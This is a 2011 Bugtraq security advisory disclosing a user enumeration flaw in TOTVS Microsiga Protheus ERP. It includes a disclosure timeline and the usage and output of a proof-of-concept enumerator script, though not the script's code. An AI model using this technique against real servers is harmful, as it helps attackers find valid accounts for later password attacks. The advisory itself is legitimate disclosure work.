[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[DCA-2011-0002]: TOTVS ERP Microsiga Protheus - Users Enumeration
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: [DCA-2011-0002]: TOTVS ERP Microsiga Protheus - Users Enumeration
- From: Flavio do Carmo Junior aka waKKu <carmo.flavio@xxxxxxxxxxxxx>
- Date: Fri, 4 Mar 2011 10:14:57 -0300
[DCA-2011-0002]
[Discussion]
- DcLabs Security Research Group advises about following vulnerability(ies):
[Software]
- TOTVS ERP Microsiga Protheus
[Vendor Product Description - Portuguese]
- Software de Gestão - TOTVS
A TOTVS é uma empresa de software, inovação, relacionamento e suporte
à gestão, líder absoluta no Brasil, com 49,1% de share de mercado, e
também na América Latina, com 31,2%*, é a maior empresa de softwares
aplicativos sediada em países emergentes e a 7ª maior do mundo no
setor.Tem mais de 25,2 mil clientes ativos, conta com o apoio de 9 mil
participantes e está presente em 23 países.
Proposta de Valor
Tornar a empresa mais competitiva, com maior velocidade de decisão,
oferecendo soluções que organizam, disciplinam, definem e impõem
processos, armazenam dados, geram informação e auxiliam a gestão.
- Fonte: http://totvs.com.br/web/guest/software
[Advisory Timeline]
- 02/Feb/2011 -> Initial contact to vendor, security contact request.
- 03/Feb/2011 -> Security contact response.
- 03/Feb/2011 -> First notification sent, release date set to March 01, 2011.
- 04/Feb/2011 -> Vendor confirms notification received.
- 21/Feb/2011 -> Situation report requested.
- 01/Mar/2011 -> No vendor response.
- 02/Mar/2011 -> Advisory published.
[Bug Summary]
- Users enumeration
[Impact]
- Low
[Affected Version]
- Microsiga Protheus 8 (20081215030344)
- Microsiga Protheus 10 (20100812040605)
- Other versions can also be affected but weren't tested.
[Bug Description and Proof of Concept]
- The server validates the user before asking for a password, thus we
can keep trying usernames until we get a password prompt.
- A Proof of Concept has been created:
--- command line output begin ---
[waKKu@localhost: codes] # ./totvs_users_enumerator.py -h
usage: totvs_users_enumerator.py [options] [filename]
-h for help
options:
--version show program's version number and exit
-h, --help show this help message and exit
-i IPADDRESS, --ipaddress=IPADDRESS
Server IP address
-p PORT, --port=PORT Port number (defaults to 1234)
-t TARGET, --target=TARGET
Target Version: 8 -> Protheus 8 | 10 -> Protheus 10.
Defaults to 10
[waKKu@localhost: codes] # ./totvs_users_enumerator.py --target 10
--ipaddress 192.168.4.95 userlist
Valid user: admin
Invalid user: fakeuser
Invalid user: nobody
Valid user: jonas
Valid user: fernando
Invalid user: elvis
--- command line output end ---
----------------------------------------------------------------------------------------
All flaws described here were discovered and researched by:
Flávio do Carmo Júnior aka waKKu.
DcLabs Security Research Group
carmo.flavio <AT> dclabs <DOT> com <DOT> br
[Workarounds]
- An initial workaround was provided to block user after 3 failed
password attempts, but it doesn't work against this kind of users
enumeration.
[Credits]
DcLabs Security Research Group.
--
--
Atenciosamente,
Flávio do Carmo Júnior aka waKKu @ DcLabs
Florianópolis/SC
http://br.linkedin.com/in/carmoflavio
http://0xcd80.wordpress.com